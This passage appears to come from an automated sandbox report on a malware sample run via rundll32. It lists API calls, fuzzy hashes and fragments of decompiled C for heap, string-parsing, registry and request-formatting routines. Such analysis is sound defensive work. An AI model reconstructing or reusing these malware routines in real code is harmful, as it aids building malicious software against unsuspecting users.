                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                                          • String ID:
                                                          • API String ID: 1610602887-0
                                                          • Opcode ID: b4c0f2e307e7096c892e2e802bdbb55d124651c01af604140dce899b1132ba81
                                                          • Instruction ID: 75c9797d5615042472cc7879c52487f1535a863ff45385b5911d7953db7cb28f
                                                          • Opcode Fuzzy Hash: b4c0f2e307e7096c892e2e802bdbb55d124651c01af604140dce899b1132ba81
                                                          • Instruction Fuzzy Hash: 5EF0AF77E002087BDB14ABA4EC1EF9E76F9DB84351F050128F606E7240EAB49A0086A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062771B4 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771D3
                                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771DE
                                                          • _wcsupr.NTDLL ref: 062771EB
                                                          • lstrlenW.KERNEL32(00000000), ref: 062771F3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 2533608484-0
                                                          • Opcode ID: f3ea24abff9ed03f0af76b77b2aeabaa4ff6f29e61600fa771bf83f69d4f0b4e
                                                          • Instruction ID: a0e6d6e98ccafb46ca0521e18bb4281039a2bb473322808ae6bdf4478d8f01c0
                                                          • Opcode Fuzzy Hash: f3ea24abff9ed03f0af76b77b2aeabaa4ff6f29e61600fa771bf83f69d4f0b4e
                                                          • Instruction Fuzzy Hash: 2DF0E932A113112F93D26A756C8CE6F579DBFC16A47100929FE24D2440DE74CC42C5B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C384 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0628C3A3
                                                            • Part of subcall function 06278FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 06278FBA
                                                            • Part of subcall function 06278FAE: CloseHandle.KERNEL32(?), ref: 06278FC8
                                                            • Part of subcall function 06278FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 06278FE4
                                                          • CloseHandle.KERNEL32(?), ref: 0628C3B1
                                                          • InterlockedDecrement.KERNEL32(0629A05C), ref: 0628C3C0
                                                            • Part of subcall function 0628E831: SetEvent.KERNEL32(000005A0,0628C3DB), ref: 0628E83B
                                                            • Part of subcall function 0628E831: CloseHandle.KERNEL32(000005A0), ref: 0628E850
                                                            • Part of subcall function 0628E831: HeapDestroy.KERNELBASE(064A0000), ref: 0628E860
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 0628C3DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                          • String ID:
                                                          • API String ID: 1141245775-0
                                                          • Opcode ID: cb38811cff3896d8e79346d3a83231273ccefde1761c44e77827e5010766f532
                                                          • Instruction ID: 939140d549a29bc97b59f861737447f15303cf66e40c6ab625d0e35db5d1d470
                                                          • Opcode Fuzzy Hash: cb38811cff3896d8e79346d3a83231273ccefde1761c44e77827e5010766f532
                                                          • Instruction Fuzzy Hash: 26F0A430661304AFDB426B689C49F9D3769FB86730B510318FA25A71C0DB749C02CBB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D765B Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E036D765B(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x36da3cc; // 0x59695b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x36da3cc; // 0x59695b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x36da030) {
					HeapFree( *0x36da2d8, 0, _t8);
				}
				_t9 = E036D6E6D(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x36da3cc; // 0x59695b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                          0x036d765b
                                                          0x036d765b
                                                          0x036d7664
                                                          0x036d7674
                                                          0x036d7674
                                                          0x036d7679
                                                          0x036d767e
                                                          0x00000000
                                                          0x00000000
                                                          0x036d766e
                                                          0x036d766e
                                                          0x036d7680
                                                          0x036d7684
                                                          0x036d7696
                                                          0x036d7696
                                                          0x036d76a1
                                                          0x036d76a6
                                                          0x036d76a9
                                                          0x036d76ae
                                                          0x036d76b2
                                                          0x036d76b8

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D7664
                                                          • Sleep.KERNEL32(0000000A), ref: 036D766E
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D7696
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D76B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 357dd47953c5bb792ca70e8fc5cbabb187f45fcee7ea309e51abfe8837dc5aa7
                                                          • Instruction ID: 8431deb419103cb948d46c6501f9894059761e445c147df835a86d1d7ab46da9
                                                          • Opcode Fuzzy Hash: 357dd47953c5bb792ca70e8fc5cbabb187f45fcee7ea309e51abfe8837dc5aa7
                                                          • Instruction Fuzzy Hash: C4F03470E062819BD720FFA8ED48F0A7BE8AB50740B08A409F901C626DD330E870CB1A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628A451 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628A477
                                                          • memcpy.NTDLL ref: 0628A49F
                                                            • Part of subcall function 06287950: NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                            • Part of subcall function 06287950: RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                            • Part of subcall function 06287950: SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          • GetLastError.KERNEL32(00000010,00000218,0629386D,00000100,?,00000318,00000008), ref: 0628A4B6
                                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0629386D,00000100), ref: 0628A599
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 685050087-0
                                                          • Opcode ID: 91c8998d442aeab2e9912c1daca1ba4baa7416fbdbc554debb58459a74d7863f
                                                          • Instruction ID: abec4e23efcfbf9a48560e43f202cd8d3ed173787f47ac524aeb77cb82057b90
                                                          • Opcode Fuzzy Hash: 91c8998d442aeab2e9912c1daca1ba4baa7416fbdbc554debb58459a74d7863f
                                                          • Instruction Fuzzy Hash: 404198B15157019FD7A1EF24DC41B9BB7E9BF88310F00892DF999C6190EB70D554CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D216C Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D216C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E036D3695(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x36da348; // 0x228d5a8
				_t4 = _t24 + 0x36dbe58; // 0x5969400
				_t5 = _t24 + 0x36dbe00; // 0x4f0053
				_t26 = E036D155C( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x36da348; // 0x228d5a8
						_t11 = _t32 + 0x36dbe4c; // 0x59693f4
						_t48 = _t11;
						_t12 = _t32 + 0x36dbe00; // 0x4f0053
						_t52 = E036D28C4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x36da348; // 0x228d5a8
							_t13 = _t35 + 0x36dba51; // 0x30314549
							_t37 = E036D41FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x36da2fc - 6;
								if( *0x36da2fc <= 6) {
									_t42 =  *0x36da348; // 0x228d5a8
									_t15 = _t42 + 0x36dbde2; // 0x52384549
									E036D41FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x36da348; // 0x228d5a8
							_t17 = _t38 + 0x36dbe90; // 0x5969438
							_t18 = _t38 + 0x36dbe68; // 0x680043
							_t45 = E036D74B6(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x36da2d8, 0, _t52);
						}
					}
					HeapFree( *0x36da2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E036D3AC2(_t54);
				}
				return _t45;
			}



















                                                          0x036d216c
                                                          0x036d217c
                                                          0x036d217f
                                                          0x036d2186
                                                          0x036d2188
                                                          0x036d2188
                                                          0x036d218b
                                                          0x036d2190
                                                          0x036d2197
                                                          0x036d21a4
                                                          0x036d21a9
                                                          0x036d21ad
                                                          0x036d21bb
                                                          0x036d21c9
                                                          0x036d21cd
                                                          0x036d225e
                                                          0x036d225e
                                                          0x036d21d3
                                                          0x036d21d3
                                                          0x036d21d8
                                                          0x036d21d8
                                                          0x036d21df
                                                          0x036d21eb
                                                          0x036d21ed
                                                          0x036d21ef
                                                          0x036d21f1
                                                          0x036d21f8
                                                          0x036d2203
                                                          0x036d220a
                                                          0x036d220c
                                                          0x036d2213
                                                          0x036d2215
                                                          0x036d221c
                                                          0x036d2227
                                                          0x036d2227
                                                          0x036d2213
                                                          0x036d222c
                                                          0x036d2231
                                                          0x036d2238
                                                          0x036d2256
                                                          0x036d2258
                                                          0x036d2258
                                                          0x036d21ef
                                                          0x036d226a
                                                          0x036d226a
                                                          0x036d226c
                                                          0x036d2271
                                                          0x036d2273
                                                          0x036d2273
                                                          0x036d227e

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05969400,00000000,?,76CDF710,00000000,76CDF730), ref: 036D21BB
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05969438,?,00000000,30314549,00000014,004F0053,059693F4), ref: 036D2258
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,036D66BE), ref: 036D226A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: a9142a5f26beebc30d076b019eabcabe48bbcb98317ec21e54d0f02703118de0
                                                          • Instruction ID: 420a8a10266c02c671573fa6948c0a9562b3808c23496e4a9f96c7b53f58cfab
                                                          • Opcode Fuzzy Hash: a9142a5f26beebc30d076b019eabcabe48bbcb98317ec21e54d0f02703118de0
                                                          • Instruction Fuzzy Hash: 8D31E236D0020CBFCB11EBD5DC84EAE7BBDEB48700F1A0159F600AB259D7B19A15DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D43EB Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E036D43EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x36da348; // 0x228d5a8
				_t2 = _t22 + 0x36db67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x36da2ec >= 5) {
					_t30 = E036D56C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x36da2ec =  *0x36da2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E036D708D(_t50, _t49); // executed
					_t34 = E036D2B23(_t49, _t50); // executed
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x36da2ec < 5) {
							 *0x36da2ec =  *0x36da2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E036D561E();
					HeapFree( *0x36da2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x36da3e0; // 0x5969b78
				if(RtlAllocateHeap( *0x36da2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E036D300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















                                                          0x036d43f2
                                                          0x036d43f9
                                                          0x036d43fd
                                                          0x036d4402
                                                          0x036d440d
                                                          0x036d441d
                                                          0x036d446c
                                                          0x036d4471
                                                          0x036d4471
                                                          0x036d4474
                                                          0x036d4478
                                                          0x036d44b2
                                                          0x036d44b2
                                                          0x036d44b8
                                                          0x036d44bf
                                                          0x036d44bf
                                                          0x036d447a
                                                          0x036d447d
                                                          0x036d447f
                                                          0x036d448c
                                                          0x036d448e
                                                          0x036d4495
                                                          0x036d44cc
                                                          0x036d44d1
                                                          0x036d44d3
                                                          0x036d44d5
                                                          0x036d44d5
                                                          0x00000000
                                                          0x036d44d3
                                                          0x036d4497
                                                          0x036d449e
                                                          0x036d44ac
                                                          0x00000000
                                                          0x036d44ac
                                                          0x036d441f
                                                          0x036d443a
                                                          0x036d4454
                                                          0x00000000
                                                          0x036d4454
                                                          0x036d444d
                                                          0x00000000

                                                          APIs
                                                          • wsprintfA.USER32 ref: 036D440D
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D4432
                                                            • Part of subcall function 036D300E: GetTickCount.KERNEL32 ref: 036D3025
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3072
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D308F
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D30B1
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D30D8
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3103
                                                            • Part of subcall function 036D300E: HeapFree.KERNEL32(00000000,?), ref: 036D3116
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3135
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 036D44AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$AllocateCountTick
                                                          • String ID:
                                                          • API String ID: 1307794992-0
                                                          • Opcode ID: b1aea64a54a9a82af790bc95fb0525e5a059d767595b633a09d468b7d3c9e462
                                                          • Instruction ID: 48a5d42bab65909311a1be79ba00e1708d714c1a1fdda7bddbf1b62677115a1e
                                                          • Opcode Fuzzy Hash: b1aea64a54a9a82af790bc95fb0525e5a059d767595b633a09d468b7d3c9e462
                                                          • Instruction Fuzzy Hash: 09315E75D01208EFCB01EFA6D884E9A3BBCFB08344F148016F905EB254DB70DAA5CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06286C1E Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,06299068,0627E6ED,00000001,00000000,0689C314,0629906E,00000000,00000000,0628CB01,0689C314,75BCC740,00000000), ref: 06286C72
                                                          • RegSetValueExA.KERNEL32(06299068,00000003,00000000,00000003,06299068,00000028), ref: 06286CB3
                                                          • RegCloseKey.ADVAPI32(?), ref: 06286CBF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: c922fce9960025ad7c745d92c3997983efcc0485775a5069cbeb6f2cb64cae53
                                                          • Instruction ID: aadb76e803333a42e67bc88b2b0e8a745dd0afc5c438e44f8d7ddac265b52282
                                                          • Opcode Fuzzy Hash: c922fce9960025ad7c745d92c3997983efcc0485775a5069cbeb6f2cb64cae53
                                                          • Instruction Fuzzy Hash: 9C314471D11329EFDFA1DF94EC4899EBBB9EB84724F14415AEE14A3280D3754A84CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D3B58 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E036D3B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x36da2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E036D7A1E(_t57 - _a4, _a4, _t48);
							_t38 = E036D7A1E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E036D7A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                                          0x036d3b60
                                                          0x036d3b63
                                                          0x036d3b65
                                                          0x036d3b6e
                                                          0x036d3b80
                                                          0x036d3b80
                                                          0x036d3b84
                                                          0x036d3b86
                                                          0x036d3b89
                                                          0x036d3b8c
                                                          0x036d3b95
                                                          0x036d3b9f
                                                          0x036d3ba3
                                                          0x036d3ba8
                                                          0x036d3bb8
                                                          0x036d3bbe
                                                          0x036d3bc2
                                                          0x036d3c11
                                                          0x036d3bc4
                                                          0x036d3bc4
                                                          0x036d3bcd
                                                          0x036d3bdc
                                                          0x036d3be1
                                                          0x036d3bee
                                                          0x036d3bf7
                                                          0x036d3c02
                                                          0x036d3c09
                                                          0x036d3c0d
                                                          0x036d3c0d
                                                          0x036d3bc2
                                                          0x036d3c18
                                                          0x036d3c1f

                                                          APIs
                                                          • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 036D3B8C
                                                          • StrStrA.SHLWAPI(00000000,?), ref: 036D3B99
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D3BB8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 556738718-0
                                                          • Opcode ID: 9cb9c38bb8c17c3ad3441c53ff137ec6e5f377f2a5860c2266b27b70ef7553a8
                                                          • Instruction ID: 01ac27968b2ad0a8dcd65064f6f0eeb1ef0d3e441bde35efcdd569b5ec0e0ab4
                                                          • Opcode Fuzzy Hash: 9cb9c38bb8c17c3ad3441c53ff137ec6e5f377f2a5860c2266b27b70ef7553a8
                                                          • Instruction Fuzzy Hash: EB21BE3AA04249AFCF11DF68C884B9EBFB5EF85310F188154EC04AB309C731EA55CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06276261 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0629087A: lstrlen.KERNEL32(?,00000000,0628BA3E,00000027,0629A1E8,?,00000000,?,?,0628BA3E,?,00000001,?,06280971,00000000,?), ref: 062908B0
                                                            • Part of subcall function 0629087A: lstrcpy.KERNEL32(00000000,00000000), ref: 062908D4
                                                            • Part of subcall function 0629087A: lstrcat.KERNEL32(00000000,00000000), ref: 062908DC
                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 062762A8
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 062762BE
                                                          • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 06276307
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 4131162436-0
                                                          • Opcode ID: c0ad1c89150cfc5b1b62bf193cf1ac24db22e7693bb2f925fda6a3c939090700
                                                          • Instruction ID: d4fe976318c9774a834745291d3911054ae17ba335ca113f8e7619475f81cd8f
                                                          • Opcode Fuzzy Hash: c0ad1c89150cfc5b1b62bf193cf1ac24db22e7693bb2f925fda6a3c939090700
                                                          • Instruction Fuzzy Hash: 96214D71D10209BFDB41DFD5DC85CEEBBBDEB45254B104069EA10A3111E770AE59DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6E6D Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E036D6E6D(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E036D6D63(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x36d9284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                          0x036d6e71
                                                          0x036d6e7e
                                                          0x036d6e80
                                                          0x036d6e81
                                                          0x036d6e89
                                                          0x036d6e89
                                                          0x036d6e8d
                                                          0x00000000
                                                          0x00000000
                                                          0x036d6e84
                                                          0x036d6e85
                                                          0x036d6e88
                                                          0x036d6e88
                                                          0x036d6e95
                                                          0x036d6e9a
                                                          0x036d6e9f
                                                          0x036d6ea7
                                                          0x036d6ead
                                                          0x036d6eaf
                                                          0x036d6eb2
                                                          0x036d6eb6
                                                          0x036d6eb8
                                                          0x036d6ebb
                                                          0x036d6ebb
                                                          0x036d6ebc
                                                          0x036d6ebe
                                                          0x036d6ebb
                                                          0x036d6ec8
                                                          0x036d6ecb
                                                          0x036d6ece
                                                          0x036d6ecf
                                                          0x036d6ed1
                                                          0x036d6ed8
                                                          0x036d6ed8
                                                          0x036d6ee4

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,059695AC,?,?,036D76A6,?,059695AC), ref: 036D6E89
                                                          • StrTrimA.SHLWAPI(?,036D9284,00000002,?,036D76A6,?,059695AC), ref: 036D6EA7
                                                          • StrChrA.SHLWAPI(?,00000020,?,036D76A6,?,059695AC), ref: 036D6EB2
                                                          Memory Dump Source
